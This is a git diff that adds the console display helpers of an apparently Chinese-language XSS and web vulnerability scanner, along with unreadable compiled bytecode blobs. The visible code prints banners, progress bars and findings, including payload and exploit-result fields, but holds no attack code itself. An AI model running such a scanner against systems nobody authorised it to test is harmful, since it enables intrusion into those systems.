+    return f"{COLORS[color]}{text}{COLORS['RESET']}"
+
+def display_banner():
+    """显示扫描器的Banner"""
+    banner = f"""
+{colored('='*80, 'CYAN')}
+{colored('    __  _____ ___     ___                              ', 'CYAN')}
+{colored('    \\ \\/ / __/ __|   / __|__ _ _ _  _ _  ___ _ _      ', 'CYAN')}
+{colored('     >  <\\__ \\__ \\  | (__/ _` | \' \\| \' \\/ -_) \'_|    ', 'CYAN')}
+{colored('    /_/\\_\\___/___/   \\___\\__,_|_||_|_||_\\___|_|       ', 'CYAN')}
+{colored('                                                       ', 'CYAN')}
+{colored('='*80, 'CYAN')}
+{colored('    XSS深度漏洞扫描器 v1.0.0                          ', 'CYAN')}
+{colored('    作者: Lucifrix                           ', 'CYAN')}
+{colored('    支持的漏洞类型: XSS, CSRF, SQL注入, LFI, RFI, SSRF, XXE', 'CYAN')}
+{colored('='*80, 'CYAN')}
+"""
+    print(banner)
+
+def display_progress(current, total, message="正在扫描", width=50):
+    """
+    显示进度条
+    
+    Args:
+        current: 当前进度
+        total: 总进度
+        message: 显示的消息
+        width: 进度条宽度
+    """
+    # 避免除以零
+    if total == 0:
+        total = 1
+        
+    # 计算进度百分比
+    percent = current / total
+    completed = int(width * percent)
+    remaining = width - completed
+    
+    # 构建进度条
+    progress_bar = f"[{colored('#' * completed, 'GREEN')}{' ' * remaining}] {int(percent * 100)}%"
+    
+    # 显示进度条
+    sys.stdout.write(f"\r{message}: {progress_bar}")
+    sys.stdout.flush()
+    
+    # 如果完成，则换行
+    if current == total:
+        sys.stdout.write("\n")
+
+def display_results(results, total_time):
+    """
+    显示扫描结果
+    
+    Args:
+        results: 扫描结果列表
+        total_time: 总耗时
+    """
+    # 合并所有结果的统计信息
+    total_stats = {
+        'pages_scanned': 0,
+        'forms_tested': 0,
+        'parameters_tested': 0,
+        'vulnerabilities_found': 0
+    }
+    
+    all_vulnerabilities = []
+    
+    for result in results:
+        # 更新统计信息
+        for key in total_stats:
+            if key in result['statistics']:
+                total_stats[key] += result['statistics'][key]
+        
+        # 收集所有漏洞
+        all_vulnerabilities.extend(result['vulnerabilities'])
+    
+    # 显示统计信息
+    print(f"\n{colored('='*80, 'CYAN')}")
+    print(f"{colored('扫描统计信息:', 'CYAN')}")
+    print(f"{colored('='*80, 'CYAN')}")
+    print(f"总耗时: {total_time:.2f}秒")
+    print(f"扫描页面数: {total_stats['pages_scanned']}")
+    print(f"测试表单数: {total_stats['forms_tested']}")
+    print(f"测试参数数: {total_stats['parameters_tested']}")
+    print(f"发现漏洞数: {colored(str(total_stats['vulnerabilities_found']), 'RED' if total_stats['vulnerabilities_found'] > 0 else 'GREEN')}")
+    
+    # 如果有漏洞，则显示漏洞详情
+    if all_vulnerabilities:
+        print(f"\n{colored('='*80, 'RED')}")
+        print(f"{colored('漏洞详情:', 'RED')}")
+        print(f"{colored('='*80, 'RED')}")
+        
+        # 按漏洞类型分组
+        vuln_by_type = {}
+        for vuln in all_vulnerabilities:
+            vuln_type = vuln['type']
+            if vuln_type not in vuln_by_type:
+                vuln_by_type[vuln_type] = []
+            vuln_by_type[vuln_type].append(vuln)
+        
+        # 显示各类漏洞详情
+        for vuln_type, vulns in vuln_by_type.items():
+            print(f"\n{colored(f'● {vuln_type} 漏洞 ({len(vulns)}个):', 'YELLOW')}")
+            
+            for i, vuln in enumerate(vulns, 1):
+                print(f"\n  {colored(f'#{i}', 'BOLD')} {colored(vuln['url'], 'UNDERLINE')}")
+                print(f"  - {colored('风险等级:', 'BOLD')} {colored(vuln['severity'], 'RED' if vuln['severity'] == '高' else 'YELLOW' if vuln['severity'] == '中' else 'GREEN')}")
+                print(f"  - {colored('描述:', 'BOLD')} {vuln['description']}")
+                
+                if 'parameter' in vuln:
+                    print(f"  - {colored('参数:', 'BOLD')} {vuln['parameter']}")
+                    
+                if 'payload' in vuln:
+                    print(f"  - {colored('Payload:', 'BOLD')} {vuln['payload']}")
+                    
+                if 'details' in vuln:
+                    print(f"  - {colored('详情:', 'BOLD')} {vuln['details']}")
+                    
+                if 'exploit_result' in vuln:
+                    print(f"  - {colored('利用结果:', 'BOLD')} {vuln['exploit_result']['description']}")
+                    
+                if 'recommendation' in vuln:
+                    print(f"  - {colored('修复建议:', 'BOLD')} {vuln['recommendation']}")
+    else:
+        print(f"\n{colored('='*80, 'GREEN')}")
+        print(f"{colored('恭喜! 未发现漏洞。', 'GREEN')}")
+        print(f"{colored('='*80, 'GREEN')}")
+        
+    print(f"\n{colored('扫描完成!', 'CYAN')}")
+    print(f"{colored('='*80, 'CYAN')}")
+
+def display_vulnerability(vuln):
+    """
+    显示单个漏洞的详细信息
+    
+    Args:
+        vuln: 漏洞信息
+    """
+    print(f"\n{colored('='*80, 'RED')}")
+    print(f"{colored('漏洞详情:', 'RED')}")
+    print(f"{colored('='*80, 'RED')}")
+    
+    print(f"URL: {colored(vuln['url'], 'UNDERLINE')}")
+    print(f"类型: {colored(vuln['type'], 'YELLOW')}")
+    print(f"风险等级: {colored(vuln['severity'], 'RED' if vuln['severity'] == '高' else 'YELLOW' if vuln['severity'] == '中' else 'GREEN')}")
+    print(f"描述: {vuln['description']}")
+    
+    if 'parameter' in vuln:
+        print(f"参数: {vuln['parameter']}")
+        
+    if 'payload' in vuln:
+        print(f"Payload: {vuln['payload']}")
+        
+    if 'details' in vuln:
+        print(f"详情: {vuln['details']}")
+        
+    if 'exploit_result' in vuln:
+        print(f"利用结果: {vuln['exploit_result']['description']}")
+        
+    if 'recommendation' in vuln:
+        print(f"修复建议: {vuln['recommendation']}")
+        
+    print(f"{colored('='*80, 'RED')}")
+
+def prompt_yes_no(message):
+    """
+    提示用户输入是/否
+    
+    Args:
+        message: 提示消息
+        
+    Returns:
+        bool: 用户选择是返回True，否返回False
+    """
+    valid_responses = {
+        'y': True, 'yes': True, '是': True, 
+        'n': False, 'no': False, '否': False
+    }
+    
+    while True:
+        response = input(f"{message} (y/n): ").lower()
+        if response in valid_responses:
+            return valid_responses[response]
+        print("请输入 'y' 或 'n'")
+
+def prompt_input(message, default=None):
+    """
+    提示用户输入
+    
+    Args:
+        message: 提示消息
+        default: 默认值
+        
+    Returns:
+        str: 用户输入
+    """
+    if default:
+        prompt = f"{message} [{default}]: "
+    else:
+        prompt = f"{message}: "
+        
+    response = input(prompt)
+    
+    # 如果用户没有输入，则使用默认值
+    if not response and default is not None:
+        return default
+        
+    return response 
\ No newline at end of file
diff --git a/xss_scanner/utils/__pycache__/crawler.cpython-313.pyc b/xss_scanner/utils/__pycache__/crawler.cpython-313.pyc
new file mode 100644
index 0000000000000000000000000000000000000000..3991bfb3641e58ca67bf03037c4a0fd054bf0c92
GIT binary patch
literal 13126
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
Ph5S3T#C(fFN;>%;?*@Xt

literal 0
HcmV?d00001

diff --git a/xss_scanner/utils/__pycache__/http_client.cpython-313.pyc b/xss_scanner/utils/__pycache__/http_client.cpython-313.pyc
new file mode 100644
index 0000000000000000000000000000000000000000..a76ebb87caf2468f415d2b26396ea267652e8fee
GIT binary patch
literal 11007
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
